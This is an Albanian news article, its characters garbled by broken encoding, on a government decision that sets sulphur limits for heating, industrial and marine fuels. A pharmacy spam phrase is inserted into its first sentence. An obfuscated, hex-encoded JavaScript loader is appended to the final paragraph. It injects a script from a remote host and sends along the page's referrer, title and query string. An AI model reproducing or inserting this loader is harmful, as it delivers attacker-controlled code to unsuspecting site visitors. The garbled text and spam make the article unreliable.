largea_gas-pump1352967518

Qeveria, norma tA� reja pA�r karburantet

finasteride pas cher. PA�rmes njA� vendimi tA� djeshA�m qeveria ka pA�rcaktuar norma strikte tA� pA�rmbajtjes sA� squfurit nA� karburantet pA�r pA�rdorim termik, civil e industrial, si dhe pA�r pA�rdorim nA� mjetet e transportit ujor. LA�ndA�t djegA�se tA� lA�ngA�ta tA� mesme tA� rA�nda (gas oil), mund tA� pA�rdoren pA�r makineritA� lA�vizA�se jorrugore dhe pA�r traktorA�t e makineritA� e tjera bujqA�sore, me kusht qA� pA�rmbajtja e squfurit tA� jetA� mA� e vogA�l se 0,1%.

PA�rmbajtja e squfurit nA� lA�ndA�t djegA�se tA� lA�ngA�ta tA� rA�nda pas datA�s 31 dhjetor 2013 nuk duhet tA� kalojA� 3% ndaj masA�s, ndA�rkohA� qA� pas datA�s 31 dhjetor 2014 nuk duhet tA� kalojA� 1% ndaj masA�s.

PA�RMBAJTJA E SQUFURIT
Vendimi pA�rcakton se nA� territorin e RepublikA�s sA� ShqipA�risA�, duke filluar nga data 31 dhjetor 2012 do tA� lejohet si lA�ndA� djegA�se pA�r pA�rdorim termik, civil e industrial, vetA�m tregtimi i lA�ndA�ve vajguri; lA�ndA� djegA�se tA� lA�ngA�ta, fraksione tA� mesme; gazoil me njA� pA�rmbajtje squfuri mA� tepA�r se 0.001% ndaj masA�s, por jo mA� tepA�r se 0.002% ndaj masA�s; gazoil me njA� pA�rmbajtje squfuri mA� tepA�rse 0.002% ndaj masA�s, por jo mA� tepA�r se 0.1% ndaj masA�s; ose gazoil me pA�rmbajtje squfuri mA� tepA�r se 0,1% ndaj masA�s,
por jo mA� tepA�r se 1%) ndaj masA�s, qA� plotA�son kA�rkesat e standardit shqiptar. NA� territorin e RepublikA�s sA� ShqipA�risA�, duke filluar nga data 31 dhjetor 2012 do tA� lejohet, pA�r qA�llim pA�rdorimi nA� mjete tA� transportit ujor (detar, lumor ose liqenor), vetA�m tregtimi i lA�ndA�ve djegA�se tA� lA�ngA�ta marinA� (marine fuel), qA� plotA�sojnA� kA�rkesat e standardit shqiptar SSH ISO 8217 ose tA� standardeve tA� tjera, tA� barasvlershme me tA�, me pA�rjashtim tA� kushtit pA�r pA�rmbajtjen e squfurit sipas pA�rcaktimeve tA� reja ligjore.
STANDARDETA�
Qeveria i argumenton ndryshimet nA� ligj me pA�rshtatjen e standardeve ndA�rkombA�tare nA� fushA�n e hidrokarbureve si dhe me kushtet qA� duhen respektuar nA� kuadrin e mbrojtjes sA� mjedisit. NA�se si rezultat i njA� ndryshimi tA� papritur, nA� furnizimin e vendit me naftA� tA� papA�rpunuar, produkte tA� naftA�s dhe hidrokarbure tA� tjera (ndA�rprerje e tregut), bA�het e vA�shtirA�, pA�r tA� aplikuar kufizime pA�r pA�rmbajtjen maksimale tA� squfurit, ministria pA�rgjegjA�se pA�r hidrokarburet, pas marrjes sA� miratimit prej KA�shillit tA� Ministrave, tA� shprehur nA�pA�rmjet vendimit pA�rkatA�s, pA�r kA�tA� situatA� do tA� informojA� Sekretariatin e Komunitetit tA� EnergjisA�, nA� VjenA�, pA�r procedim tA� mA�tejshA�m.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}